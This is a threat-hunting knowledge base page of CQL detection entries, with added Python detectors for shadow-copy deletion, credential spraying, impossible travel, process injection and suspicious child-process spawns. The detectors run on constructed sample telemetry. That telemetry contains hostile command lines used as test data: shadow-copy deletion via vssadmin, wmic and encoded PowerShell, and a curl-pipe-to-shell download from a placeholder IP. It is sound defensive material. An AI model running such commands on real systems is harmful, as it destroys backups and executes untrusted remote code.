CQL Knowledge Base
Ready-to-use CQL queries for threat hunting, detection, and SOC triage. Copy, filter, and search in seconds.
Malicious Deep Link: Messaging App Spawning Command Interpreters
Detects exploitation of URI scheme handlers in desktop messaging apps (WhatsApp, Telegram, Discord, Signal) that spawn OS command interpreters, a behavioral pattern consistent with CVE-2025-55177 and malicious deep-link attacks.
Shadow Copy Deletion via VSS Tools — Basic Detection
Basic detection of VSS shadow copy deletion via vssadmin, wmic, or PowerShell. Shadow copy and backup deletion is among the most reliable ransomware precursors and should raise an immediate alert in any SOC environment regardless of other context.
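Added example, not part of the knowledge base and not its CQL query: a Python implementation of the same shadow-copy-deletion logic run over constructed process-creation records, so the matching can be checked offline. It goes slightly beyond the entry above by also decoding a PowerShell -EncodedCommand payload before matching and by treating vssadmin's resize-shadowstorage trick as a deletion. The record fields, file paths, user names and sample command lines are assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Constructed stand-in for a process-creation record (host, user, parent, image, command line)."""
    timestamp: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Images each tool runs as. pwsh.exe is listed so PowerShell 7 is not a blind spot.
TOOL_IMAGES = {
    "vssadmin": {"vssadmin.exe"},
    "wmic": {"wmic.exe"},
    "powershell": {"powershell.exe", "pwsh.exe"},
}

# Deletion idioms per tool. 'resize shadowstorage' is included because shrinking the store to a
# tiny /maxsize evicts existing copies without the word 'delete' appearing anywhere.
SHADOW_DELETE_PATTERNS = {
    "vssadmin": re.compile(r"\bdelete\s+shadows\b|\bresize\s+shadowstorage\b", re.I),
    "wmic": re.compile(r"\bshadowcopy\b.*\bdelete\b", re.I),
    "powershell": re.compile(
        r"win32_shadowcopy.*(?:\.delete\(\)|remove-wmiobject|remove-ciminstance)"
        r"|(?:remove-wmiobject|remove-ciminstance).*win32_shadowcopy", re.I | re.S),
}

# -e, -ec, -enc and -EncodedCommand are the common spellings; PowerShell accepts other prefixes too.
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def expand_command_line(cmdline: str) -> str:
    """Append the decoded payload of a PowerShell -EncodedCommand so the regexes can see it."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def detect_shadow_copy_deletion(events):
    alerts = []
    for ev in events:
        image = basename(ev.image)
        full = expand_command_line(ev.cmdline)
        lowered = full.lower()
        # Attribute by image first, then fall back to the tool name inside a wrapper such as cmd.exe /c ...
        candidates = ([t for t, imgs in TOOL_IMAGES.items() if image in imgs]
                      or [t for t in TOOL_IMAGES if t in lowered])
        for tool in candidates:
            if SHADOW_DELETE_PATTERNS[tool].search(full):
                alerts.append({"host": ev.host, "user": ev.user, "parent": basename(ev.parent),
                               "tool": tool, "command": full, "severity": "critical"})
                break
    return alerts


def sample_events():
    """Constructed telemetry: three deletions (one base64-encoded) and two benign commands."""
    payload = "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"
    encoded = base64.b64encode(payload.encode("utf-16le")).decode()
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return [
        ProcessEvent("2025-01-10T03:12:01Z", "FS01", "CORP\\svc-backup", "C:\\Windows\\System32\\cmd.exe",
                     "C:\\Windows\\System32\\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
        ProcessEvent("2025-01-10T03:12:02Z", "FS01", "CORP\\svc-backup", "C:\\Windows\\System32\\cmd.exe",
                     "C:\\Windows\\System32\\wbem\\WMIC.exe", "wmic shadowcopy delete"),
        ProcessEvent("2025-01-10T03:12:05Z", "WS07", "CORP\\jdoe", "C:\\Windows\\explorer.exe", ps,
                     f"powershell.exe -NoP -W Hidden -EncodedCommand {encoded}"),
        ProcessEvent("2025-01-10T09:00:00Z", "FS01", "CORP\\admin", "C:\\Windows\\System32\\cmd.exe",
                     "C:\\Windows\\System32\\vssadmin.exe", "vssadmin.exe list shadows"),
        ProcessEvent("2025-01-10T09:00:10Z", "WS07", "CORP\\jdoe", "C:\\Windows\\explorer.exe", ps,
                     "powershell.exe Get-Process | Where-Object CPU -gt 100"),
    ]


if __name__ == "__main__":
    for alert in detect_shadow_copy_deletion(sample_events()):
        print(alert["host"], alert["user"], alert["tool"], "<-", alert["parent"])
```

The wrapper fallback matters in practice: the process that deletes the copies is often cmd.exe or a script host with vssadmin only in its command line, so a rule keyed on the image name alone misses it. Decoding is only done for the base64 form; an attacker who stages the deletion through a script file on disk needs a separate file-read or script-content rule.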
Web Server Spawning Unexpected Shell Processes — Basic Detection
Basic detection of web server RCE exploitation patterns: any application runtime (Node.js, Python, PHP, Ruby, Java) spawning an OS shell or recon utility such as bash, curl, wget, or whoami, the core post-exploitation indicator for CVE-2025-55182 (React2Shell).
APT Lateral Movement via Remote Administrative Protocols
Detects APT lateral movement using remote administration protocols (SMB, WMI, WinRM) initiated from command-line tools on end-user hosts. Correlates administrative processes with outbound connections to management ports.
APT Chained WMIC Reconnaissance Detection
Detects suspicious chained use of wmic.exe by APT actors for system reconnaissance: hardware inventory, user accounts, running processes, and network config. Filters legitimate parents like WmiPrvSE and msiexec to reduce false positives.
Archive Tool Spawning Shell Processes (Compressed File Exploitation)
Detects shell or LOLBin processes directly spawned by archiving utilities like WinRAR or 7-Zip, behavior associated with code execution via malicious archives similar to WinRAR CVE-2023-38831.
Credential Spray and Authentication Bypass on Network Logon
Detects credential spraying and potential authentication bypass attempts against incomplete access control implementations. Identifies high-frequency network logons from a single source IP and classifies each source by risk level.
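Added example, not the knowledge base's CQL: a Python version of the spray logic above over constructed network-logon records. It slides a ten-minute window per source IP, counts distinct target accounts and failures, and tiers the risk so that a spray which produced a successful logon outranks one that only failed. Field names, the window, the five-account floor and the sample IPs are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class LogonEvent:
    """Constructed stand-in for a logon record; logon_type 3 is a network logon (SMB, RPC, LDAP ...)."""
    ts: datetime
    source_ip: str
    user: str
    logon_type: int
    success: bool


def classify(distinct_users: int, failures: int, successes: int, min_users: int) -> str:
    """Risk tiering: a spray that landed a valid credential is the case that needs a human now."""
    if successes and failures >= min_users:
        return "critical"
    if distinct_users >= 4 * min_users:
        return "high"
    return "medium"


def detect_credential_spray(events, window=timedelta(minutes=10), min_users=5):
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.logon_type == 3:
            by_ip[ev.source_ip].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        best, left = None, 0
        for right in range(len(evs)):
            while evs[right].ts - evs[left].ts > window:   # drop events older than the window
                left += 1
            win = evs[left:right + 1]
            users = {e.user for e in win}
            if len(users) < min_users:
                continue
            # '>=' so the latest window with the widest account coverage wins, and a late hit is kept
            if best is None or len(users) >= best["distinct_users"]:
                failures = sum(1 for e in win if not e.success)
                hits = sorted({e.user for e in win if e.success})
                best = {"source_ip": ip, "window_start": win[0].ts, "window_end": win[-1].ts,
                        "distinct_users": len(users), "attempts": len(win), "failures": failures,
                        "compromised_users": hits,
                        "risk": classify(len(users), failures, len(hits), min_users)}
        if best:
            findings.append(best)
    return sorted(findings, key=lambda f: f["distinct_users"], reverse=True)


def sample_events():
    """Constructed telemetry: one spray with a hit, one failed spray, one noisy but legitimate server."""
    t0 = datetime(2025, 1, 10, 2, 0, 0)
    evs = []
    # 203.0.113.5: one password tried against 12 accounts in under 3 minutes, one hit (jsmith)
    targets = ["asmith", "bjones", "cwhite", "dlee", "ekim", "fwong",
               "gpatel", "hchen", "ijones", "jsmith", "kmoore", "lrae"]
    for i, user in enumerate(targets):
        evs.append(LogonEvent(t0 + timedelta(seconds=15 * i), "203.0.113.5", user, 3, user == "jsmith"))
    # 198.51.100.7: two service accounts logging on repeatedly and successfully (expected file-server noise)
    for i in range(30):
        evs.append(LogonEvent(t0 + timedelta(seconds=20 * i), "198.51.100.7",
                              ["svc-sql", "svc-web"][i % 2], 3, True))
    # 203.0.113.9: six accounts, all failed, within six minutes
    for i, user in enumerate(["u1", "u2", "u3", "u4", "u5", "u6"]):
        evs.append(LogonEvent(t0 + timedelta(minutes=i), "203.0.113.9", user, 3, False))
    # an interactive (type 2) failure is out of scope for a network-logon rule
    evs.append(LogonEvent(t0, "10.0.0.4", "console", 2, False))
    return evs


if __name__ == "__main__":
    for f in detect_credential_spray(sample_events()):
        print(f["risk"], f["source_ip"], f["distinct_users"], "accounts", f["compromised_users"])
```

Counting distinct accounts rather than raw attempts is what separates a spray from a brute force against one account and from a busy server: the file server above generates more logons than either attacker but never crosses the account floor.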
AWS IAM Abuse for Establishing Persistence
Detects AWS IAM operations indicative of APT persistence: user creation, administrative policy attachment, access key generation, role creation, and trust policy modification. Designed for environments with Falcon Cloud Security integrated.
Web Browser Spawning a Command Interpreter Process
Detects when a web browser process directly spawns a command interpreter or scripting engine. Highly anomalous behavior associated with browser exploitation, advanced social engineering, or drive-by download attacks.
CMD Shell Reconnaissance Commands APT-3 Style
Detects cmd.exe executions with system enumeration commands associated with APT-3 group, including whoami, net user, ipconfig, systeminfo, and nltest for domain trust reconnaissance.
Linux GTFOBins Abuse for Privilege Escalation
Detects abuse of native Linux binaries listed in GTFOBins to escape restricted environments, read sensitive system files, or spawn elevated shells. Covers LOTL techniques actively used by threat actors in Linux and macOS environments.
Shell Process Spawned by Node.js (Potential React2Shell Exploitation)
Detects shell or scripting processes spawned by Node.js, a potential indicator of CVE-2025-55182 (React2Shell) exploitation — an insecure deserialization vulnerability in the React Server Components Flight protocol enabling remote code execution.
PowerShell Remote Download Cradle Detection
Identifies PowerShell executions containing typical remote download patterns (IEX, Net.WebClient, BitsTransfer), techniques used in early APT compromise stages to download and execute in-memory payloads without touching disk.
Basic Detection: Child Processes Spawned by WMI Provider Host
Basic query to detect any process spawned by WmiPrvSE.exe. Unexpected child process generation from the WMI Provider Host may indicate remote command execution or persistence. Ideal for SOC analysts starting with threat hunting in CrowdStrike Falcon.
WMIC Abuse via Non-Standard Parent Process (APT-Style)
Detects WMIC.exe executions spawned by unusual parent processes matching APT reconnaissance and lateral movement techniques. Excludes legitimate management tools and classifies risk by frequency.
Impossible Travel Detection via RDP Logon Sequences
Detects impossible travel by analyzing consecutive RDP logons from the same user across different countries, using neighbor() to compare adjacent events in time.
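Added example, not the knowledge base's CQL: a Python rendering of the adjacent-event comparison above over constructed RDP logons. Each logon is paired with the user's previous logon (the role neighbor() plays in the query), and a pair is reported when the country changes and the great-circle distance divided by the elapsed time exceeds a commercial-flight speed. Geolocation fields, coordinates, the 900 km/h threshold and the sample users are assumptions.

```python
import math
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class RdpLogon:
    """Constructed stand-in for a successful RDP logon (LogonType 10) enriched with source geolocation."""
    ts: datetime
    user: str
    source_ip: str
    country: str
    lat: float
    lon: float


EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def detect_impossible_travel(logons, max_speed_kmh=900.0):
    by_user = defaultdict(list)
    for lg in logons:
        by_user[lg.user].append(lg)

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e.ts)
        for prev, cur in zip(evs, evs[1:]):      # each logon against its immediate predecessor
            if prev.country == cur.country:      # the rule, like the query, keys on a country change
                continue
            hours = (cur.ts - prev.ts).total_seconds() / 3600.0
            dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            speed = dist / hours if hours > 0 else math.inf   # simultaneous logons are trivially impossible
            if speed > max_speed_kmh:
                findings.append({"user": user, "from": (prev.country, prev.source_ip),
                                 "to": (cur.country, cur.source_ip), "distance_km": round(dist, 1),
                                 "hours": round(hours, 2), "speed_kmh": round(speed, 1)})
    return findings


def sample_logons():
    """Constructed telemetry: one impossible hop, one plausible trip, one same-country pair."""
    t0 = datetime(2025, 1, 10, 9, 0)
    return [
        RdpLogon(t0, "alice", "203.0.113.10", "DE", 50.11, 8.68),                       # Frankfurt
        RdpLogon(t0 + timedelta(minutes=45), "alice", "198.51.100.23", "SG", 1.35, 103.82),  # Singapore
        RdpLogon(t0 - timedelta(hours=1), "bob", "192.0.2.5", "GB", 51.51, -0.13),       # London
        RdpLogon(t0 + timedelta(hours=3), "bob", "192.0.2.77", "FR", 48.86, 2.35),       # Paris, 4 h later
        RdpLogon(t0, "carol", "203.0.113.40", "US", 40.71, -74.01),                       # New York
        RdpLogon(t0 + timedelta(minutes=5), "carol", "203.0.113.41", "US", 34.05, -118.24),  # Los Angeles
    ]


if __name__ == "__main__":
    for f in detect_impossible_travel(sample_logons()):
        print(f["user"], f["from"], "->", f["to"], f["distance_km"], "km in", f["hours"], "h")
```

The carol pair shows the caveat of keying on country: New York to Los Angeles in five minutes is just as impossible, but a country-change filter never evaluates it. Dropping that filter and relying on the speed check alone catches it, at the cost of more noise from mobile carriers and VPN egress points whose geolocation jumps within a country.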
Lateral Movement Scoring via SMB + Process Correlation
Detects lateral movement by correlating outbound SMB connections with remote process execution on the destination host, assigning a composite risk score per behavior.
Process Injection Chain Detection with Risk Scoring
Identifies process injection chains by correlating CreateRemoteThread, WriteProcessMemory, and post-injection behavior using correlate() to link the 3-step sequence.
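Added example, not the knowledge base's CQL: a small in-order sequence matcher in Python that plays the role correlate() plays in the query above, applied to constructed sensor events. It links WriteProcessMemory and CreateRemoteThread on the same (host, target process) key, then looks for the injected process acting on its own (spawning a shell or opening a network connection) within a short window, and scores the chain. Event shape, window, image paths and score weights are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Event:
    """Constructed stand-in for sensor telemetry. 'pid' is the acting process, 'target_pid' the one acted on."""
    ts: datetime
    host: str
    kind: str            # WriteProcessMemory | CreateRemoteThread | ProcessCreate | NetworkConnect
    pid: int
    image: str
    target_pid: Optional[int] = None
    target_image: str = ""
    detail: str = ""


def correlate_sequence(events, steps, window):
    """Greedy in-order matcher. steps is a list of (name, predicate, key_fn); every event that satisfies
    step 1 opens a candidate chain, and each later step must follow in time, share the same key and
    fall within 'window' of the first event."""
    events = sorted(events, key=lambda e: e.ts)
    chains = []
    for i, first in enumerate(events):
        if not steps[0][1](first):
            continue
        key, chain, last_ts = steps[0][2](first), [first], first.ts
        for _name, pred, key_fn in steps[1:]:
            nxt = next((e for e in events[i + 1:]
                        if e.ts >= last_ts and e.ts - first.ts <= window
                        and key_fn(e) == key and pred(e)), None)
            if nxt is None:
                break
            chain.append(nxt)
            last_ts = nxt.ts
        else:                                     # every step matched
            chains.append((key, chain))
    return chains


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe"}
HIGH_VALUE_TARGETS = {"lsass.exe", "explorer.exe", "svchost.exe", "winlogon.exe"}

# Step 1 and 2 key on the process being written to; step 3 keys on the process doing something,
# so the injected process has to be the actor for the chain to close.
INJECTION_STEPS = [
    ("write", lambda e: e.kind == "WriteProcessMemory" and e.target_pid != e.pid,
     lambda e: (e.host, e.target_pid)),
    ("thread", lambda e: e.kind == "CreateRemoteThread", lambda e: (e.host, e.target_pid)),
    ("post", lambda e: (e.kind == "ProcessCreate" and basename(e.target_image) in SHELLS)
     or e.kind == "NetworkConnect", lambda e: (e.host, e.pid)),
]


def score_chain(chain):
    write, _thread, post = chain
    score = 50
    if basename(write.target_image) in HIGH_VALUE_TARGETS:
        score += 20
    if any(p in write.image.lower() for p in ("\\temp\\", "\\appdata\\", "\\downloads\\")):
        score += 10                               # injector running from a user-writable path
    score += 20 if post.kind == "ProcessCreate" else 10
    return min(score, 100)


def detect_injection_chains(events, window=timedelta(seconds=30)):
    results = []
    for (host, target_pid), chain in correlate_sequence(events, INJECTION_STEPS, window):
        post = chain[2]
        results.append({"host": host, "injector": chain[0].image, "target_pid": target_pid,
                        "target": chain[0].target_image,
                        "post_injection": f"{post.kind}: {post.detail or post.target_image}",
                        "score": score_chain(chain)})
    return results


def sample_events():
    """Constructed telemetry: one real chain, one debugger that never completes the sequence."""
    t0 = datetime(2025, 1, 10, 14, 0, 0)
    dropper = "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"
    dbg = "C:\\Program Files\\Debugger\\dbg.exe"
    return [
        Event(t0, "WS01", "WriteProcessMemory", 4242, dropper, 1337, "C:\\Windows\\explorer.exe"),
        Event(t0 + timedelta(seconds=1), "WS01", "CreateRemoteThread", 4242, dropper, 1337, "C:\\Windows\\explorer.exe"),
        Event(t0 + timedelta(seconds=3), "WS01", "ProcessCreate", 1337, "C:\\Windows\\explorer.exe",
              5101, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c whoami"),
        Event(t0, "WS02", "WriteProcessMemory", 900, dbg, 901, "C:\\Dev\\app.exe"),
        Event(t0 + timedelta(seconds=1), "WS02", "CreateRemoteThread", 900, dbg, 901, "C:\\Dev\\app.exe"),
        Event(t0 + timedelta(seconds=2), "WS02", "NetworkConnect", 777,
              "C:\\Program Files\\Mozilla Firefox\\firefox.exe", None, "", "93.184.216.34:443"),
        Event(t0 + timedelta(minutes=5), "WS01", "NetworkConnect", 1337, "C:\\Windows\\explorer.exe",
              None, "", "203.0.113.77:8443"),
    ]


if __name__ == "__main__":
    for r in detect_injection_chains(sample_events()):
        print(r["host"], r["injector"], "->", r["target"], r["post_injection"], "score", r["score"])
```

The debugger on WS02 produces the same first two API calls as the dropper; what separates the two is the third step, so the post-injection behaviour is the part of the chain worth spending tuning effort on rather than the API pair, which legitimate tooling generates constantly.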
APT 3 - Multi-Tool Discovery via CMD Shell (T1059.003)
Detects multiple native Windows discovery tools launched from cmd.exe by the same user on the same host. Characteristic pattern of APT 3 (Gothic Panda) using Windows Command Shell (T1059.003) to run commands like whoami, ipconfig, and systeminfo during initial compromise phases.
Browser Engine Exploit Indicator — Suspicious Shell Spawned from Browser Process
Detects when a web browser process (Chrome, Edge, Firefox) directly spawns a command interpreter or LOLBin, anomalous behavior that may indicate exploitation of critical browser engine vulnerabilities such as type-confusion V8 zero-days.
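Added example, not the knowledge base's CQL, serving the parent-child entries on this page together: messaging apps spawning interpreters, web runtimes spawning shells (including the Node.js/React2Shell case), archivers spawning shells, WMI Provider Host spawning children, and browsers spawning interpreters or LOLBins. It is a Python classifier over constructed process-creation records that maps the parent to one of those classes, grades the child (interpreter vs. recon tool), skips self-spawns such as browser renderers and Node workers, and raises severity when the command line carries a download-and-execute indicator. Class membership, paths, users and the sample encoded command are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Constructed stand-in for a process-creation record."""
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


PARENT_CLASSES = {
    "browser": {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"},
    "messaging_app": {"whatsapp.exe", "telegram.exe", "discord.exe", "signal.exe"},
    "web_runtime": {"node", "node.exe", "python", "python3", "python.exe", "php", "php-fpm", "php.exe",
                    "ruby", "ruby.exe", "java", "java.exe", "w3wp.exe", "httpd", "nginx"},
    "archiver": {"winrar.exe", "7z.exe", "7zfm.exe", "7zg.exe"},
    "wmi_provider_host": {"wmiprvse.exe"},
}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
                "sh", "bash", "dash", "zsh", "python", "python3", "perl"}
RECON_TOOLS = {"whoami", "whoami.exe", "id", "uname", "hostname", "hostname.exe", "curl", "curl.exe", "wget",
               "net.exe", "net1.exe", "nltest.exe", "ipconfig.exe", "systeminfo.exe", "tasklist.exe"}
# Command-line fragments that turn a bare spawn into download-and-execute
EXEC_INDICATORS = re.compile(
    r"\bcurl\b|\bwget\b|\biex\b|invoke-expression|downloadstring|bitstransfer|-enc\b|-encodedcommand|https?://",
    re.I)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_parent(parent):
    for cls, names in PARENT_CLASSES.items():
        if parent in names:
            return cls
    return None


def detect_suspicious_spawns(events):
    alerts = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        cls = classify_parent(parent)
        if cls is None or parent == child:        # self-spawn (renderers, workers, sub-interpreters) is normal
            continue
        if child in INTERPRETERS:
            severity = "high"
        elif child in RECON_TOOLS:
            severity = "medium"
        else:
            continue
        if EXEC_INDICATORS.search(ev.cmdline):
            severity = "critical"
        alerts.append({"host": ev.host, "user": ev.user, "category": cls, "parent": parent,
                       "child": child, "cmdline": ev.cmdline, "severity": severity})
    return alerts


def sample_events():
    """Constructed telemetry: five anomalous spawns and three benign ones."""
    chrome = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    cmd = "C:\\Windows\\System32\\cmd.exe"
    return [
        # '-enc ZQBjAGgAbwAgAGgAaQA=' is 'echo hi' in UTF-16LE base64, a harmless stand-in for a real payload
        ProcessEvent("WS01", "CORP\\alice", chrome, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                     "powershell.exe -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA="),
        ProcessEvent("WS01", "CORP\\alice", chrome, chrome, "chrome.exe --type=renderer"),
        ProcessEvent("web01", "www-data", "/usr/bin/node", "/bin/sh", 'sh -c "curl http://203.0.113.9/a.sh | sh"'),
        ProcessEvent("web01", "www-data", "/usr/bin/node", "/usr/bin/node", "node worker.js"),
        ProcessEvent("WS02", "CORP\\bob", "C:\\Program Files\\WinRAR\\WinRAR.exe", cmd,
                     "cmd.exe /c start invoice.pdf .cmd"),
        ProcessEvent("WS03", "NT AUTHORITY\\NETWORK SERVICE", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
                     "C:\\Windows\\System32\\whoami.exe", "whoami /all"),
        ProcessEvent("WS04", "CORP\\carol", "C:\\Users\\carol\\AppData\\Local\\Discord\\app-1.0\\Discord.exe", cmd,
                     "cmd.exe /c whoami"),
        ProcessEvent("WS04", "CORP\\carol", "C:\\Windows\\explorer.exe", cmd, "cmd.exe"),
    ]


if __name__ == "__main__":
    for a in detect_suspicious_spawns(sample_events()):
        print(a["severity"], a["category"], a["parent"], "->", a["child"], "|", a["cmdline"])
```

The self-spawn exclusion is the single biggest noise reducer for this family of rules: browsers fork renderer and GPU processes, and Node and Python fork workers, thousands of times a day. Anything beyond that (updaters, installer helpers, IDE terminals launched from Electron apps) is environment-specific and belongs in a per-tenant allowlist keyed on the full parent path, not just the basename.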
